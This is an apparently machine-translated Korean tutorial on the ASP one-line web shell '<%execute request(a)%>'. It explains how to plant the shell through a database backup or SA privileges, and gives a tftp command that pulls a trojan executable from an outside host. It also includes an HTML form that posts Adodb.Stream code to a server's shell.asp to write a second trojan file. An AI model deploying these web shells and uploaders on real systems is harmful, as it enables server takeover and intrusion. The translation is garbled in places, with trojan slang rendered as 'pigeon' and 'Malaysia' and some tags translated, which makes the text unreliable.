한 문장으로 구성된 트로이 목마는 ASP 파일에 삽입됩니다. 물론 한 문장으로 구성된 트로이 목마 자체가 ASP 파일입니다. IE를 사용하여 액세스 가능: 액세스할 수 있는 경우에만 데이터를 제출할 수 있습니다.
HTTP 프로토콜을 통한 액세스
한 문장으로 트로이 목마의 사용 범위(2가지 유형만 나열했습니다):
1) 데이터베이스 백업만 필요
데이터베이스를 asp 파일로 백업할 때 컴파일 오류가 발생하지 않으며 스크립트 닫기 플래그가 누락되었습니다. %>
2) SA 권한 설정 시 편의상 먼저 문장을 작성하는 것이 일반적입니다. (물론 tftp를 통해 비둘기를 직접 업로드하고 실행하는 것이 더 빠릅니다.)
tftp -i ip 서버.exe 가져오기
트로이 목마 <%execute request(a)%>의 원리를 한 문장으로 표현하면 다음과 같습니다.
먼저 알아라
Execute() 함수는 우리가 업로드한 말을 실행하고 분석을 위해 asp.dll에 전달하는 역할을 담당합니다. 위 코드 <%execute request(a)%>는 다음과 같이 설명할 수 있습니다.
<%
request(a)<>인 경우 request(a)를 실행합니다.
%>
a가 비어 있지 않으면 실행됩니다. 무엇을 실행할까요?...
!= 0인 경우
클라이언트를 살펴보겠습니다.
<양식 작업=http://192.168.0.28/shell.asp 방법=포스트>
<텍스트 영역 이름=l cols=120행=10너비=45>
set lP=server.CreateObject(Adodb.Stream) 'Adodb.Stream 구성 요소를 생성합니다..
lP.열기
lP.유형=2
lP.CharSet=gb2312
lP.writetext 요청(p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.닫기
lP=아무것도 설정하지 않음
response.redirect dbbak.asp
</textarea>
<textarea name=p cols=120 Rows=10 width=45>제출할 데이터</textarea><BR><center><br>
<입력 유형=제출 값=제출>
Adodb.Stream은 읽기 데이터를 서버에 업로드하는 역할을 담당합니다.
구성 요소: Adodb.Stream
다음과 같은 방법이 있습니다:
취소 방법
사용방법
개체.취소
설명: 보류 중인 비동기 Execute 또는 Open 메서드 호출의 실행을 취소합니다.
WriteText 메서드
그것을 사용하는 방법:
Object.Write(데이터,[옵션])
설명: 지정된 텍스트 데이터를 개체에 로드합니다.
매개변수 설명: 데이터는 기록할 지정된 내용입니다.
옵션 작성 옵션은 지정하지 않을 수 있습니다. 선택적 매개변수는 다음과 같습니다.
adWriteChar =0
adWriteLine =1
SaveToFile 메서드
그것을 사용하는 방법:
Object.SaveToFile(파일 이름,[옵션])
설명: FileName으로 지정된 파일에 개체의 내용을 씁니다.
즉, 우리가 Trojan을 저장하는 파일 이름은 dbbak.asp입니다.
매개변수 설명: FileName으로 지정된 파일
지정되지 않은 상태로 둘 수 있는 옵션 액세스 옵션은 다음과 같습니다.
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
Trojan 문장을 제출한 후, a의 값은 비어 있고 쓰여진 값을 기다리고 있습니다. http://www.***.com/**.asp에 접속하는 것은 실행을 준비하는 방법입니다. ) 기능.. .
서버에 데이터를 쓰는 Adodb.Stream을 만듭니다.
동시에 이 구성 요소에 의해 정의된 SaveToFile 변수는 말레이시아 이름을 정의합니다..dbbak.asp
서버에 제출한 후 실행() 함수는 a의 값이 비어 있지 않음을 감지하여 Malaysia!를 실행합니다.